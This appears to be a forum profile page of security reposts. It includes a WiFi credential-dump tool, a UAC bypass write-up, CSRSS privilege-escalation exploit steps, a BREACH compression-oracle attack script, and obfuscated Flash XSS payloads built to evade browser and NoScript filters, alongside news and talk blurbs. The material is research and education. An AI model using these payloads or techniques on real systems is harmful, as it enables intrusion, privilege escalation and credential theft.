Everything posted by Nytro
-
Derbycon 2013 - Pass-The-Hash 2: The Admin's Revenge - Skip Duckwall, Chris Campbell

Description: Some vulnerabilities just can't be patched. Pass-the-Hash attacks against Windows enterprises are still successful and are more popular than ever. Since the PTH-Suite was released at BlackHat last year, Microsoft published their guide for mitigating the attack. Skip and Chris will cover some of the shortcomings in their strategies and offer practical ways to detect and potentially prevent hashes from being passed on your network. Learn how to stop an attacker's lateral movement in your enterprise.

Bio: "Chris co-presented the PTH talk last year at Blackhat. Also spoke at BsidesLV, Derbycon, Shmoocon & BsidesPR. www.obscuresec.com, @obscuresec. Works for Crucial Security (Harris Corp). Skip co-presented the PTH talk last year at Blackhat. Also spoken at Defcon, Derbycon. passing-the-hash.blogspot.com, @passingthehash on Twitter. Works for Accuvant Labs."

For more information please visit: DerbyCon : Louisville, Kentucky; Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Sursa: Derbycon 2013 - Pass-The-Hash 2: The Admin's Revenge - Skip Duckwall, Chris Campbell
-
WiFi Password Dump

About

WiFi Password Dump is a free command-line tool to quickly recover all the wireless account passwords stored on your system.

It automatically recovers all types of wireless keys/passwords (WEP/WPA/WPA2 etc.) stored by the Windows Wireless Configuration Manager. For each recovered WiFi account it displays the following information:

WiFi Name (SSID)
Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
Password Type
Password in Hex format
Password in clear text

Being a command-line tool makes it useful for penetration testers and forensic investigators. For a GUI version check out the Wi-Fi Password Decryptor. It works on both 32-bit and 64-bit platforms, from Windows Vista to Windows 8.

WiFi Password Secrets

Depending on the platform, the 'Wireless Configuration Manager' uses different techniques and storage locations to securely store the WiFi settings.

On Vista and higher systems all the wireless parameters, including SSID, authentication method and encrypted password, are stored in the following file:

C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\{Random-GUID}.xml

Here each wireless device is represented by its interface GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}, and all the wireless settings for this device are stored in an XML file with a random GUID name.

If you are interested to know how these WiFi settings are stored and how 'WiFi Password Decryptor' actually recovers the passwords, read our research article, Exposing the WiFi Password Secrets.

How to use?

WiFi Password Dump is a very easy to use tool. It is a command-line/console based tool, hence you have to launch it from the command prompt (cmd.exe) as Administrator. Here is the simple usage information:

Launch the command prompt (cmd.exe) on your system as Administrator.
In the cmd prompt move to the directory where you have installed or copied the WiFiPasswordDump tool.
Now run the tool by just typing WiFiPasswordDump.exe
It will automatically discover and display all the recovered wireless passwords as shown in the screenshot below.

Screenshots

Screenshot 1: 'WiFiPasswordDump' showing all the recovered wireless passwords from a Windows 7 system.

Release History

Version 1.0: 8th Oct 2013
First public release of WiFi Password Dump.

Download

FREE Download WiFi Password Dump v1.0
License: Freeware
Platform: Windows Vista, Windows 2008, Windows 7, Windows 8

Sursa: WiFi Password Dump : Free Command-line Tool to Recover Wireless Passwords
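Reading those profile files, as an added example (not the tool's code): a Python parser for the WLANProfile XML stored at the path above, run over a constructed sample profile when no Wlansvc directory is present. The namespace and element names are those of the standard WLAN profile schema; the keyMaterial value in the sample is a placeholder, and decrypting a real one (a DPAPI blob protected under the SYSTEM account) is left out, which is one reason such tools need an elevated prompt.

```python
import glob
import os
import xml.etree.ElementTree as ET

# Profile store described in the post (Vista and later). The {Interface-GUID}
# and {Random-GUID} parts are globbed, not guessed.
PROFILE_ROOT = r"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces"
NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# Constructed sample profile so the parser runs offline. The keyMaterial value
# is a placeholder, not a real DPAPI blob; on a live system it is the encrypted key.
SAMPLE_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>CorpWiFi</name>
  <SSIDConfig><SSID><hex>436F727057694669</hex><name>CorpWiFi</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>true</protected>
      <keyMaterial>01000000D08C9DDF0115D1118C7A00C04FC297EB</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>
"""


def find_profiles(root: str = PROFILE_ROOT) -> list:
    """All profile XML files: one directory per interface GUID, one file per network."""
    return sorted(glob.glob(os.path.join(root, "{*}", "{*}.xml")))


def parse_profile(xml_text: str) -> dict:
    """Pull the fields WiFiPasswordDump prints out of one WLANProfile document."""
    root = ET.fromstring(xml_text)

    def text(path: str):
        el = root.find(path, NS)
        return el.text.strip() if el is not None and el.text else None

    sec = "w:MSM/w:security/"
    key_material = text(sec + "w:sharedKey/w:keyMaterial")
    return {
        "ssid": text("w:SSIDConfig/w:SSID/w:name"),
        "authentication": text(sec + "w:authEncryption/w:authentication"),
        "encryption": text(sec + "w:authEncryption/w:encryption"),
        "key_type": text(sec + "w:sharedKey/w:keyType"),
        # protected=true means keyMaterial is a DPAPI blob bound to the SYSTEM
        # account; only code running as SYSTEM can CryptUnprotectData it.
        "protected": text(sec + "w:sharedKey/w:protected") == "true",
        "key_material": key_material,
        "key_material_bytes": bytes.fromhex(key_material) if key_material else b"",
    }


def read_file(path: str) -> str:
    with open(path, encoding="utf-8-sig") as fh:
        return fh.read()


def dump(paths: list) -> list:
    """Parse every profile on disk; fall back to the sample when none is found."""
    docs = [read_file(p) for p in paths] or [SAMPLE_PROFILE]
    return [parse_profile(d) for d in docs]


if __name__ == "__main__":
    for entry in dump(find_profiles()):
        state = "DPAPI-protected" if entry["protected"] else "clear"
        print(f"{entry['ssid'] or '?':<20} {entry['authentication']}/{entry['encryption']} "
              f"{entry['key_type']} key={state} ({len(entry['key_material_bytes'])} bytes)")
```

Run as an administrator on Windows it lists every stored network and whether its key is still a DPAPI blob; anywhere else it parses the embedded sample. Note that an unprivileged user can read the authentication and encryption settings of every profile on the box from these files without any decryption at all.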
-
[h=1]PhysicsJS (Yes, a JavaScript Physics engine)[/h] In today's Web Wednesday post we're highlighting something you might think a little oxymoronic, a JavaScript Physics engine. It's still in an Alpha status, but even so, it's looking pretty cool... [h=2]PhysicsJS[/h] A modular, extendable, and easy-to-use physics engine for javascript PhysicsJS is still under development (alpha version 0.5.1), and documentation is unfinished. Feel free to use it, just be warned that the API is in flux and better documentation is on its way! (Contributors and help needed!) [h=4]Features[/h] Use as an AMD Module (requireJS), or global namespace. Modular! Only load what you need. The core library is only 31k minified. Extendable! Don’t like the collision detection algorithm? Replace it with your own! Not tied to a specific renderer. Display it in DOM, HTML5 Canvas, or whatever… Easy! It’s a library written IN javascript… not C compiled into javascript. The syntax is familiar for javascript developers. Extensions to support points, circles, and arbitrary convex polygons. Extensions to support constant gravity, newtonian gravity, collisions, and verlet constraints. The fastest way to get a feel for what's possible is by checking out the Demos. [h=2]Demos[/h] There's even documentation already too. [h=2]https://github.com/wellcaffeinated/PhysicsJS/wiki[/h] Introductory documentation can be found on the PhysicsJS website. The wiki contains more advanced usage instructions. Due to the newness of this library, documentation is non-exhaustive. If there are any points of confusion, please feel free to log an issue or contact me. You can also edit the wiki yourself to fill in the gaps. Any help with documenting is appreciated. 
[h=4]Topics[/h] Fundamentals Scratchpads - they speed up computations Bodies PubSub Behaviors Collisions Integrators Renderers And the source is officially available too; [h=2]https://github.com/wellcaffeinated/PhysicsJS[/h] Sursa: PhysicsJS (Yes, a JavaScript Physics engine) | Coding4Fun Blog | Channel 9
-
[h=1]C++ and the Windows Runtime[/h] Date: September 6, 2013 from 9:00AM to 9:35AM, Day 3. Speaker: Aleš Holeček. In this talk, Ales discusses the evolution of the Windows platform and the story of its development, and the key role that C++ plays in it. In the spirit of "Going Native", the new platform and application model is written almost exclusively in C++. Sursa: C++ and the Windows Runtime | GoingNative 2013 | Channel 9
-
Windows 7 UAC whitelist: Code-injection Issue (and more)

Quick Windows 7 RTM update: Everything below still applies to the final retail release of Windows 7 (and all updates as of 14/Sep/2011).

Quick Windows 8 update: Everything below still applies to the Windows 8 Developer Preview released on 13/Sep/2011. It is early days, of course, but from a quick look it does not seem that anything UAC-related has changed at all in Win8.

Contents:
Win 7 UAC Code-Injection: Program & source-code
Win 7 UAC Code-Injection: Video demonstrations
Some Quotes
Win 7 UAC Code-Injection: Summary
Win 7 UAC Code-Injection: The good news
Win 7 UAC Code-Injection: How it works
UAC in Vista and Windows 7: Mistakes then and now (Better ways MS could've responded to complaints about Vista.)
UAC Comparison: Two file-managers
If a whitelist makes sense then it must be user-configurable
Previous Windows 7 UAC issues
To those saying, "but it requires code to get on the box"
To those saying, "but UAC isn't a security boundary"
To those saying, "but it's only a beta"
Quick response to a couple of newer things

Program, Source Code and Step-by-Step Guide

While Windows 7 was still in beta Microsoft said this was a non-issue, and ignored my offers to give them full details for several months, so there can't be an issue with making everything public now.

Win7ElevateV2.zip (32-bit and 64-bit binaries; use the version for your OS.)
Win7ElevateV2_Source.zip (C++ source code, and detailed guide to how it works.)
Source in HTML format (for browsing online)
Step-by-step guide (description of what the code does)

This works against the RTM (retail) and RC1 versions of Windows 7. It probably won't work with the old beta build 7000 due to changes in which apps can auto-elevate. Microsoft could block the binaries via Windows Defender (update: they now do via MSE), or plug the CRYPTBASE.DLL hole, but unless they fix the underlying code-injection / COM-elevation problem the file copy stuff will still work.

Fixing only the CRYPTBASE.DLL part, or blocking a particular EXE or DLL, just means someone has to find a slightly different way to take advantage of the file copy part. Finding the CRYPTBASE.DLL method took about 10 minutes so I'd be surprised if finding an alternative took long. Even if the hole is fixed, UAC in Windows 7 will remain unfair on third-party code and inflexible for users who wish to use third-party admin tools.

Sursa: Windows 7 UAC whitelist: Code-injection Issue (and more)
-
[h=1]Linux SNMP MIB Browser[/h] An SNMP MIB browser is an indispensable tool for engineers and system administrators to manage SNMP-enabled network devices such as routers, switches, servers and workstations. The information provided by SNMP includes uptime, interface traffic data, routing information, TCP and UDP connection information, installed software, and much more. In this tutorial, I introduce qtmib, an easy-to-use SNMP browser available for Linux and published under the GPLv2 license. The program is built as a front-end for the net-snmp tools using the Qt4 library. [Figure: qtmib browser window]

qtmib features

qtmib offers a number of powerful features:
SNMP v1 and v2c support.
OID translation.
MIB search capabilities.
A huge number of built-in MIBs.
Support for adding private MIBs.
Network discovery.
Easy-to-read reports: system, interfaces, routing table, TCP/UDP connections, running processes, and installed software.

Installation

Installation follows the regular ./configure && make && sudo make install Unix pattern. You will need the net-snmp tools and the Qt4 development libraries as dependencies. An Ubuntu .deb package is also provided.

Screenshot tour

[Figure: qtmib host selection] [Figure: qtmib network discovery] [Figure: qtmib report selection]

Sursa: Linux SNMP MIB Browser | l3net - a layer 3 networking blog
-
CVE-2011-1281 Privilege escalation in CSRSS proof of concept

After one year without blogging (all my apologies), I'm back. A few days ago I saw the Pwnie Awards nominations list; there were lots of interesting and sophisticated bug exploitations. But one attracted my attention: "Privilege escalation in CSRSS", discovered by Matthew 'j00ru' Jurczyk. If you want to understand this vulnerability and the way to exploit it, read this excellent post: CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability | j00ru//vx tech blog. And if you're not familiar with CSRSS I advise you to read this article or this one (in French).

So, for writing the PoC we have to follow these steps:

1. Spray the shared WIN32K section by creating a sufficient amount of USER objects. The section is then going to be mapped to every process running in the context of the local desktop, thus we can perform this step at this early point.
2. Create N instances of a process, each of which will create a single zombie console (*) and then go idle.
3. Kill all N instances of the processes.
4. Create 3N local threads. (**)
5. Kill 2N threads (in the order described in the "Second Stage" section).
6. Kill the remaining N threads.
7. Emulate the Win+U key presses, resulting in a new instance of UTILMAN.EXE being created.
8. Call SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, 0xFFF7, 0), triggering the execution of CreateRemoteThread on each of the N freed handles.

* - by creating a zombie console, we also mean replacing the original PropertiesProc address (used in kernel32!AllocConsole) with a custom pointer.
** - the technique is very time-sensitive. If any handle is picked / stored on the free-list between steps 3 and 4, then steps 5 and 6 might not succeed in setting up the expected free-list handle layout.

I won't speak about the first step immediately, for different reasons. Let's start with step two, "create a single zombie console"; for me it's the hardest part. We have to code AllocConsole and AllocConsoleInternal (I only cover the Windows XP version for the moment). With AllocConsoleInternal we can control the PropRoutine & CtrlRoutine of the console. For coding this function I started googling "AllocConsoleInternal + PropRoutine + CtrlRoutine" and reached this function definition:

BOOL APIENTRY AllocConsoleInternal(
    IN LPWSTR lpTitle,
    IN DWORD dwTitleLength,
    IN LPWSTR lpDesktop,
    IN DWORD dwDesktopLength,
    IN LPWSTR lpCurDir,
    IN DWORD dwCurDirLength,
    IN LPWSTR lpAppName,
    IN DWORD dwAppNameLength,
    IN LPTHREAD_START_ROUTINE CtrlRoutine,
    IN LPTHREAD_START_ROUTINE PropRoutine,
    IN OUT PCONSOLE_INFO pConsoleInfo);

With some calls to ntdll!CsrAllocateCaptureBuffer and ntdll!CsrCaptureMessageBuffer for desktop, title and current dir memory allocation, and then ntdll!CsrClientCallServer with an AllocConsole request, we will reach winsrv!SrvAllocConsole and then spawn a console. For testing we launch a broken console and kill its process and its parent process; after that we do a "right-click + Properties/Defaults" on the broken console and then we have winsrv!InternalCreateCallbackThread executed with a free handle (the killed parent process handle, precisely)!

Steps 3, 4, 5, 6 and 8 are quite easy. Step 7 (Win+U emulation) too, but SetKeyboardState and PostMessage don't work; we have to use keybd_event (deprecated) or SendInput to invoke utilman.exe. Therefore, with all these steps we are able to get CSRSS to call CreateRemoteThread with a system process handle and a controlled start address.

Now we need step one, "Spray the shared WIN32K section of a system process with USER objects", and it's done! For this we have to invoke utilman (Win+U), which spawns three new processes:

-> utilman.exe [NT AUTHORITY\SYSTEM]
+-> utilman.exe /start [USER]
+--> narrator.exe /UM [USER]

Then we create USER objects like a MessageBox with an over-long title (32 KB). But utilman (system) doesn't share the win32k section with other processes at all times. After trying different unsuccessful methods, I decided to contact j00ru, who gave me the solution. We can inject USER objects into utilman (system) if another user (regardless of his privileges) is logged on the machine at the same time. At this moment, I haven't found an explanation of this behaviour. I think it's something in relation with Desktop/Winstation/Session; if you have some idea, tell me.

Source of the PoC: Index of /prog/blog/allocConsole

Thanks to j00ru for his help and all the shared knowledge on his blog, HITB and so on!

Sursa: CVE-2011-1281 Privilege escalation in CSRSS proof of concept
-
Microsoft pays Australian hacker $100,000 for finding security holes

Ben Grubb and Jim Finkle, October 9, 2013 - 1:11PM

Microsoft is paying a well-known Australian hacking expert more than $100,000 for finding security holes in its software, one of the largest bounties awarded to date by a tech company. The company also released a much anticipated update to Internet Explorer, which it said fixes a bug that made users of the browser vulnerable to remote attack.

James Forshaw, who heads vulnerability research at Melbourne-based consulting firm Context Information Security, won Microsoft's first $US100,000 ($106,000) bounty for identifying a new "exploitation technique" in Windows, which will allow it to develop defences against an entire class of attacks, the company said.

Forshaw is among the many "white hat" hackers who hack for good and get rewarded for their efforts. Companies such as Apple and Facebook have hall of fame pages on their websites to recognise hackers, and some companies even pay them.

Forshaw, who is currently travelling to attend a security conference, earned another $US9400 for identifying security bugs in a preview release of Microsoft's Internet Explorer 11 browser, Katie Moussouris, senior security strategist with the Microsoft Security Response Centre, said in a blog post.

"Over the past decade working in secure development and research, I have discovered many interesting security vulnerabilities with a heavy focus on complex logic bugs," Forshaw said. "I'm keenly interested in the intellectual puzzle of finding novel exploitation techniques and the creativity it requires."

To find his winning entry, Forshaw studied the mitigations available today and after brainstorming identified a few potential angles. "Not all were viable but after some persistence I was finally successful." He said receiving recognition for his entry was "exciting" to him and his employer. "It also gives me the satisfaction that I am contributing to improving the security of both Microsoft's and Context's customers."

Microsoft unveiled the reward programs four months ago to bolster efforts to prevent sophisticated attackers from subverting new security technologies in its software, which runs on the majority of the world's PCs.

Forshaw has been credited with identifying several dozen software security bugs. He was awarded a large bounty from Hewlett-Packard for identifying a way to "pwn", or take ownership of, Oracle's Java software in a high-profile contest known as Pwn2Own (pronounced "pown to own").

Microsoft also released an automatic update to Internet Explorer on Tuesday afternoon to fix a security bug that it first disclosed last month. Researchers say hackers initially exploited that flaw to launch attacks on companies in Asia in an operation that cyber security firm FireEye has dubbed DeputyDog. Marc Maiffret, chief technology officer of the cyber security firm BeyondTrust, said the vulnerability was later more broadly used after Microsoft's disclosure of the issue brought it to the attention of cybercriminals. He is advising PC users to immediately install the update to Internet Explorer, if they do not have their PCs already set to automatically download updates. "Any time they patch something that has already been used [to launch attacks] in the wild, then it is critical to apply the patch," Maiffret said.

That vulnerability in Internet Explorer was known as a "zero-day" because Microsoft, the targeted software maker, had zero days notice to fix the hole when the initial attacks exploiting the bug were discovered. In an active, underground market for "zero day" vulnerabilities, criminal groups and governments sometimes pay $US1 million or more to hackers who identify such bugs.

Microsoft's reward is slightly more generous than that of Yahoo!, which recently offered a security researcher a $US25 voucher to the company's online store for reporting three security flaws. Yahoo later opened up a program, with rewards of up to $US15,000, after security researchers ridiculed the minuscule $US25 prize.

Sursa: Microsoft pays Australian hacker $100,000 for finding security holes
-
The BREACH Attack

Rohit T, October 07, 2013

Introduction

Back in 2012, when Juliano Rizzo and Thai Duong announced the CRIME attack, a TLS/SSL compression attack against HTTPS, the ability to recover selected parts of the traffic through side-channel attacks was proven. This attack was mitigated by disabling TLS/SSL-level compression in most browsers. This year at Black Hat, a new attack called BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) was announced, and it commanded the attention of the entire industry. This presentation, titled "SSL Gone in 30 seconds", is not properly understood, and hence there seems to be some confusion about how to mitigate the problem. So I felt that this article should give some detailed insight into how notorious the attack is, how it works, how practical it is, and what needs to be done to mitigate it. So let's have a look.

BREACH Attack

Unlike previously known attacks such as BEAST, Lucky 13, etc., BREACH is not an attack against TLS; it is basically an attack against HTTP, specifically against HTTP-level compression of the response body. If you are familiar with the padding oracle attack, BREACH is somewhat easy to understand. A BREACH attack can extract login tokens, email addresses, and other sensitive information from TLS-encrypted web traffic in as little as 30 seconds (depending on the number of bytes to be extracted). The attacker just needs to trick the victim into visiting a malicious link to execute the attack. Before going into the details, let me explain a little bit more about the basic things you need to know.

Web pages are generally compressed before the responses are sent out, which is called HTTP compression, primarily to make better use of available bandwidth and to provide greater transmission speeds. The browser usually tells the server (through the "Accept-Encoding" header) what compression methods it supports, and the server accordingly compresses the content and sends it across. If the browser does not support any compression then the response is not compressed. The most commonly used compression algorithms are gzip and deflate.

Accept-Encoding: gzip, deflate

When the content arrives, it is uncompressed by the browser and processed. So, basically with SSL-enabled web sites, the content is first compressed, then encrypted and sent. But you can determine the length of this compressed content even when it is wrapped by SSL.

How Does It Work?

The attack primarily works by taking advantage of the compressed size of the text when there are repetitive terms. Here is a small example that explains how deflate takes advantage of repetitive terms to reduce the compressed size of the response. Consider the search page below, which is present after logging into this site: http://www.ghadiwala.com/catalogsearch/result/?q=

Observe that the text highlighted in the red box is the username. Now enter any text (say "random") and click "Search."

URL: Search results for: 'random' , GhadiWala.com

So you can control the response through the input parameter in the URL. Now imagine that the search term is "Pentesting" (which is the username in this case).

URL: Search results for: 'Pentesting' , GhadiWala.com

Now, when the deflate algorithm is compressing the above response, it finds that the term "Pentesting" is repeated more than once in the response. So, instead of storing it a second time, the compressor says "this text is found 101 characters ago." This reduces the size of the compressed output. In other words, by controlling the input search parameter, you can guess the username. How? The compressed size would be smallest when the search parameter matches the username. This concept is the basis for the BREACH attack.

Practical Attack

Now let us see how an attacker would practically exploit this issue and steal sensitive information. Consider the site below and assume a legitimate user has just signed in.

[before signing in to the application]
[search page, which is accessible after logging in]

As shown in the above figure, also assume that there is some sensitive data in the Search page, for example, a card number. When the user searches for something (say "test") the following message is displayed. Now an attacker, using social engineering techniques, could lure this currently signed-in user to click on a link. The link would be a simple HTML page with a JavaScript in it that continuously requests searches for the search terms 100-10000. For example, the JavaScript would request the URLs shown below:

http://localhost/demo/Search?p=100
http://localhost/demo/Search?p=101
.........
http://localhost/demo/Search?p=10000

The attacker can also get the compressed sizes of the responses for each of these requests. Can you guess why the compressed sizes of these responses would differ, and can you guess which request would have the smallest compressed size? Below are the requests with the smallest compressed sizes:

http://localhost/demo/Search?p=4545
http://localhost/demo/Search?p=5454
http://localhost/demo/Search?p=4543
http://localhost/demo/Search?p=5433

Below is the explanation of why the above requests have the smallest compressed sizes. Take the first request. Here is the response from the server:

URL: http://localhost/demo/Search?p=4545

As shown above, when the deflate algorithm encounters this, it makes an easy representation of the repetitions and thus results in the smallest compressed size. So by analyzing the compressed size of each of the requests from 100-10000, an attacker can simply deduce what the card number is in this case. The beauty of this attack lies in the fact that we did not decrypt any traffic; just by analyzing the size of the responses we were able to predict the text.

To summarize in simple steps, for an application to be vulnerable to the BREACH attack, here are the conditions that it must fulfill:

The server should be using HTTP-level compression.
There must be a parameter that reflects the input text (this will be controlled by the attacker).
The page should contain some sensitive text that would be of interest to the attacker.

Remediation

Turning off HTTP compression would save the day, but that is not a practical solution, since servers rely on it to manage bandwidth effectively. Here are some of the other solutions that can be tried:

Protecting the vulnerable pages with a CSRF token.
Adding random bytes to the response to hide the actual compressed length.
Separating the sensitive data from the pages where input text is displayed.

Sursa: The Breach Attack
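The size oracle described above, as an added example that is not code from the article: a simulated server that reflects a search query and carries a 16-digit token later in the page, compressed with zlib, and an attacker that recovers the token one hex digit at a time by picking the guess whose response compresses smallest. SECRET, the page template and the attacker-known PREFIX are constructed for the demo. The compressor is forced to static Huffman codes (Z_FIXED) and each guess is measured over eight requests padded with 0 to 7 bytes that cost 9 bits each, so the summed size is exactly linear in the compressed bit count and a single saved literal is never hidden by byte rounding; a real server uses the default strategy, and that is where the padding and "two tries" tricks from the BREACH paper come in.

```python
import zlib

# Constructed demo page: the search query is reflected first, the secret
# (a 16-digit token, chosen so every digit is distinct) comes later.
SECRET = "9f8e7d6c5b4a3210"
ALPHABET = "0123456789abcdef"
PREFIX = b'token value="'      # attacker-known bytes that precede the secret


def page(query: bytes) -> bytes:
    """Simulated server response for /Search?q=<query>."""
    return (b"<html><body><h1>Search results for: '" + query + b"'</h1>"
            b'<form><input type=hidden name=token value="' + SECRET.encode()
            + b'"></form></body></html>')


def compressed_len(body: bytes) -> int:
    """The only thing the attacker observes: the compressed body size.
    Z_FIXED forces static Huffman codes so the demo oracle is exact; a real
    server uses the default strategy and the attack then needs the padding /
    two-tries tricks from the BREACH paper."""
    c = zlib.compressobj(9, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


# Bytes 0x90-0x96 are 9-bit literals under static Huffman. Padding each guess
# with 0..7 of them and summing the sizes gives a score that is linear in the
# total bit count, so one saved 8-bit literal always shows up as a smaller score.
PADS = [bytes(range(0x90, 0x90 + j)) for j in range(8)]


def score(guess: bytes) -> int:
    """Summed compressed size over the eight padded requests for one guess."""
    return sum(compressed_len(page(guess + pad)) for pad in PADS)


def recover_token() -> str:
    """Extend the known prefix one digit at a time; the correct digit makes the
    reflected guess match the secret one byte longer, which compresses smaller."""
    known = b""
    for _ in range(len(SECRET)):
        best = min(ALPHABET, key=lambda d: score(PREFIX + known + d.encode()))
        known += best.encode()
    return known.decode()


if __name__ == "__main__":
    print("recovered token:", recover_token())
```

Each digit costs 16 guesses times 8 requests, so the whole token falls in 2048 requests without touching the ciphertext, which is the property the article's three conditions describe. Swapping Z_FIXED for the default strategy shows why the raw argmin is not enough in practice: dynamic Huffman tables give different digits different code lengths and byte rounding produces ties, so real tooling adds alignment padding and compares pairs of requests.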
-
Catch-up on Flash XSS exploitation – bypassing the guardians! – Part 1

I had tweeted a few techniques in exploiting XSS in vulnerable Flash files a few months ago. I thought it is a good idea to summarise them here and share them with you. I will try to add more parts to this in future...

Bypassing IE protection/feature against SWF reflected XSS:

It seems only IE as a browser has protections against normal reflected XSS attacks on Flash files. For example, if you open the following link in IE10, JavaScript won't be executed:

http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

Instead, it will show you the following error message in the console (press F12 to see it):

xssproject.swf, line 1 character 1
SCRIPT5: Access is denied.
xssproject.swf, line 1 character 37

The same script runs easily in Firefox (without NoScript) and Google Chrome. Moreover, the other methods that I had invented previously in the following blog post do not work in IE10: "XSS by uploading/including a SWF file | Soroush Dalili - Computer Security Is My Interest!". Now, I have found a workaround to also bypass IE10 protections and run the script:

* "<script>alert(document.domain)</script>"' *

It is based on the following simple fact: "javascript:x="echo"" in the URL will print "echo" on the screen, and it can contain HTML tags. Any script will then have access to the objects of the original page.

Flash URLDecode feature that can be used to bypass possible protections and obfuscate the attack:

If you need to send the vectors to a server behind a firewall (flashvars can be sent after the "#" character to be hidden from the server) or to bypass client-side anti-XSS protections, this method can be very useful. Flash discards invalid URL-encoded values completely:

A) It discards 2 characters if you have an invalid hex character ([^0-9a-fA-F]) immediately after the percentage character. Example: "%X" or "%="
B) It discards 3 characters if you have a valid hex character after the percentage character followed by an invalid hex character. Example: "%AX" or "%A&"

Note 1: During this test, I have observed that sometimes values greater than 127 in ASCII will be converted to a question mark ("?") character. This happens in URL redirection cases.
Note 2: Encoded BOM characters ("%EF%BB%BF") can also replace the space characters. Example: "alert(1)" can be rewritten as "alert%EF%BB%BF(1)" (Byte order mark - Wikipedia, the free encyclopedia)

Exploits can be even more deceptive if you use the following vectors: "%#" or "%A#". It will not send your complete vector to the server because of the "#" character. Example:

Original queries:

http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
"<script>alert(document.domain)</script>"'

New equivalent queries:

http://0me.me/demo/xss/xssproject.swf?%#js=al%A#e%Xrt(docum%A#ent.doma%A#in);
http://0me.me/demo/xss/xssproject.swf?%I%R%S%D%%Ljs=loca%Xtion.hr%Yef='jav%Zascri%AXpt:x="<sc%AYript>ale%AZrt(docu%?ment.dom%/ain)</sc%&ript>"'

As you can see in these examples, a Flash-based XSS attack can be obfuscated very well! NoScript was bypassed initially by using this trick but it has been patched since version 2.6.6.8 (NoScript - JavaScript/Java/Flash blocker for a safer Firefox experience! - changelog - InformAction). Thanks to Giorgio Maone (@ma1).

Next Part

I will try to post more related materials in regards to Flash security. I may divulge some 0days here..., who knows?

Sursa: Catch-up on Flash XSS exploitation – bypassing the guardians! – Part 1 | Soroush Dalili - Computer Security Is My Interest!
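The decoding rules the post describes, written out as an added Python example that is not part of the post: a decoder that applies the two discard rules and normal %XY decoding, checked against the two obfuscated queries above, plus a split that shows what the server receives versus what the SWF decodes when the vector hides behind "#". The function names are mine; the behaviour of the Flash decoder is taken from the post's description, not from testing the player.

```python
HEX = set("0123456789abcdefABCDEF")

# The two obfuscated query strings from the post and the payloads they must
# decode to (the post's "new equivalent queries", without the host/path part).
OBFUSCATED_1 = "%#js=al%A#e%Xrt(docum%A#ent.doma%A#in);"
PAYLOAD_1 = "js=alert(document.domain);"
OBFUSCATED_2 = ('%I%R%S%D%%Ljs=loca%Xtion.hr%Yef=\'jav%Zascri%AXpt:x="<sc%AYript>'
                'ale%AZrt(docu%?ment.dom%/ain)</sc%&ript>"\'')
PAYLOAD_2 = 'js=location.href=\'javascript:x="<script>alert(document.domain)</script>"\''


def flash_url_decode(s: str) -> str:
    """Decode the way the post says the Flash player does:
    %XY with two hex digits -> that byte; % followed by a non-hex char ->
    drop 2 chars; % + hex digit + non-hex char -> drop 3 chars.
    A standard decoder would reject or pass these malformed escapes through."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] != "%":
            out += s[i].encode("utf-8")
            i += 1
            continue
        a, b = s[i + 1:i + 2], s[i + 2:i + 3]
        if a in HEX and b in HEX:
            out.append(int(a + b, 16))
            i += 3
        elif a in HEX:
            i += 3            # "%A&": valid hex then invalid -> 3 chars discarded
        else:
            i += 2            # "%X", "%#", "%%": invalid hex after % -> 2 chars discarded
    # Note 1 in the post: bytes above 127 sometimes surface as "?"; errors="replace"
    # models that for invalid sequences, while a valid %EF%BB%BF survives as a BOM.
    return out.decode("utf-8", errors="replace")


def server_sees(url: str) -> str:
    """Everything after '#' is a fragment and never leaves the browser."""
    return url.split("#", 1)[0]


def flash_sees(url: str) -> str:
    """What the SWF gets: the full query string (fragment included), decoded."""
    return flash_url_decode(url.split("?", 1)[1]) if "?" in url else ""


if __name__ == "__main__":
    url = "http://0me.me/demo/xss/xssproject.swf?" + OBFUSCATED_1
    print("server log shows :", server_sees(url))
    print("flash executes   :", flash_sees(url))
```

The same decoder is a useful yardstick for a WAF or client-side filter: any filter that decodes "%A#" the standard way (leaving it in place or rejecting it) and then looks for "alert(" will not see the payload the player sees, which is the gap the post exploits.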
-
Derbycon 2013 - Windows Attacks: AT Is The New Black - Chris Gates & Mubix “Rob” Fuller

Description: A follow-on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.

Bio:

Chris Gates: Chris joined LARES in 2011 as a Partner & Principal Security Consultant. Chris has extensive experience in network and web application penetration testing as well as other Information Operations experience working as an operator for a DoD Red Team and other Full Scope penetration testing teams (regular pentesting teams too). Chris holds a BS in Computer Science and Geospatial Information Science from the United States Military Academy at West Point and holds his… redacted… no one cares anyway. In the past, he has spoken at the United States Military Academy, BlackHat, DefCon, DerbyCon, Toorcon, Brucon, Troopers, SOURCE Boston, OWASP AppSec DC, ChicagoCon, NotaCon, and CSI. He is a regular blogger at carnal0wnage.attackresearch.com

Mubix “Rob” Fuller: Mubix is a Senior Red Teamer. His professional experience starts from his time on active duty as a United States Marine. He has worked with devices and software that run the gamut in the security realm. He has a few certifications, but the titles that he holds above the rest are FATHER, HUSBAND and United States Marine.

